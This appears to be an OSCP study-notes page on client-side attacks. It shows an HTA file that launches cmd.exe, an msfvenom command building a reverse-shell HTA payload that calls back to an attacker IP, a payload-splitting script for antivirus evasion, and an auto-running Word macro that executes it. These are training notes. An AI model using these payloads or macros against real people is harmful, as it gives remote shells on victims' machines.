0Sec
0Sec
0Sec
  • Spider Security
  • offensive security
    • OSCP
      • WriteUps
        • PortSwigger
          • SQL injection labs
          • Exploiting XXE to retrieve data by repurposing a local DTD
        • PentesterLabs
          • Recon
        • HTB
          • BoardLight
          • Lame
        • THM
          • Walkthroughs
            • Attacktive Directory
            • LineKernel
            • Day 1 — Linux PrivEsc
          • CTF
            • Page
            • BLUE
            • mKingdom
            • RazorBlack
      • Module 1 (General Info)
      • Module 2 (Getting Kali)
        • Leason 1 - Booting Up Kali Linux
        • Leason 2 - The Kali Menu
        • Leason 4 - Finding Your Way Around Kali
        • Leason 5 - Managing Kali Linux Services
      • Module 3 (CLI)
        • The Bash Environment
        • Piping and Redirection
        • Text Searching and Manipulation
          • Regular
        • Managing Processes
        • File and Command Monitoring
      • Module 4 (Practical Tools)
        • Netcat
        • Socat
        • PowerShell & Powercat
        • Wireshark
        • Tcpdump
      • Module 5 (Bash Script)
      • Module 6 (Passive Info Gathering)
      • Module 7 ( Active Info Gathering)
      • Module 8 (Vulnerability Scanning)
      • Module 9 (Web Application Attacks)
        • Cross Site Scripting (XSS)
        • local file inclusion & remote file inclusion
          • Exploit LFI
        • SQL injection
          • Blind Boolean based SQL & Evasion Techniques
          • SQL
          • Login bypass List
        • File upload
        • Remote code execution
      • Module 10 ( Intro Buffer OverFlow)
      • Module 11 (Widows Buffer OverFlow)
        • Buffer OverFlow Challange
      • Module 12 (Linux Buffer OverFlows)
      • Module 13 (Clint Side Attacks)
      • Module 14 (Locating Public Exploits)
      • Module 15 (FIxing Exploits)
      • Module 16 (File Transfers)
      • Module 17 (Antivirus Evasion)
        • Windows
      • Module 18 (Privllege Escalation)
        • Windows
          • Checklist
          • THM - Windows PrivEsc Arena
        • Linux
          • Checklist
          • Linux PrivEsc Arena
      • Module 19 (Password Attacks)
      • Module 20 (Port Redirection and Tunneling)
      • Module 21 (Active Directory Attacks)
        • adbasics_v1.2
      • Module 22 (Metasploit Framwork)
      • Module 23 (Powershell Empire)
      • Course Materials
  • SANS
  • AppSec
    • EWAPTX
      • PHP Type Juggling
      • CSP
      • SqlI
        • Information_schema
        • WriteUps
      • SSTI & CSTI
      • XSS_HTML Injection
      • CORS Attack
      • Clickjacking
      • Open redirect
      • JSONP
      • LFI && LFD && RFI
      • HTTP Host header attacks
      • CSRF
      • XML injection
      • XML external entity (XXE) injection
      • APIs & JWT attacks
      • Insecure Deserialization
      • OAUTH 2.0 authentication vulnerabilities
      • Host Header Injection
      • Insecure Direct Object References (IDOR)
  • Reverse Eng & Malware dev
    • Internals
      • Windows internals
        • Topics in GitHub
        • Chapter 1 Concepts and tools
        • Chapter 2. System architecture
        • Chapter 3. Processes and jobs
        • Chapter 4. Threads
        • Chapter 5. Memory management
        • Chapter 6. I/O system
        • Chapter 7. Security
      • Linux internals ⇒ Soon
      • MacOs X internals ⇒ Soon
  • cheat sheet
    • Pentest_Notes
    • Linux BOF & Wireless Attacks
    • WriteUps
Powered by GitBook
On this page
  • Know Your Target (Enum)
  • Leveraging HTML Apps
  • Exploiting Microsoft Office
  1. offensive security
  2. OSCP

Module 13 (Clint Side Attacks)

PreviousModule 12 (Linux Buffer OverFlows)NextModule 14 (Locating Public Exploits)

Last updated 10 months ago

Know Your Target (Enum)

  • Passive Enumeration:

    • Identify the victim's browser.

  • Active Enumeration:

    • Social Engineering:

      • Craft messages or scenarios to manipulate users into revealing sensitive information or performing actions.

Leveraging HTML Apps

    • A JavaScript library to uniquely identify a browser based on its features.

  • HTA Attack:

    • Create an HTA (HTML Application) to execute malicious scripts.

      • Example HTA file (file.hta):

        <!DOCTYPE html>
        <html>
        <head>
            <script>
            var x='cmd.exe'
            new ActiveXObject('WScript.shell').Run(x);
            </script>
        </head>
        <body>
            <script> self.close() </script> 
        </body>
        </html>
      • Copy the HTA file to a web server:

        sudo cp file.hta /var/www/html/file2.hta
      • Generate an HTA payload with msfvenom:

        sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.114.134 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta

Exploiting Microsoft Office

  • Word Macro:

    • Split the payload to evade detection.

      str="" # payload from msfvenom
      n=50
      for i in range(0,len(str),n):
          print "str = Str +" + '"' + str[i:i+n] + '"'
    • Add the split payload to a Word Macro (document.docm).

      Copy

      Sub AutoOpen()
          test1
      End Sub
      
      Sub Doc_Open()
          test1
      End Sub
      
      Sub test1()
          Dim Str As String
          ' Add the splitted payload here
          CreateObject("Wscript.shell").Run Str
      End Sub
  • Object Linking and Embedding (OLE):

    • Create an evil batch file (evil.bat).

    • Create a link object in the Word document (document.docm).

Resources:

Tool:

fingerprintjs2
fingerprintjs2 GitHub Repository
Metasploit Framework (msfvenom)
Microsoft VBA Programming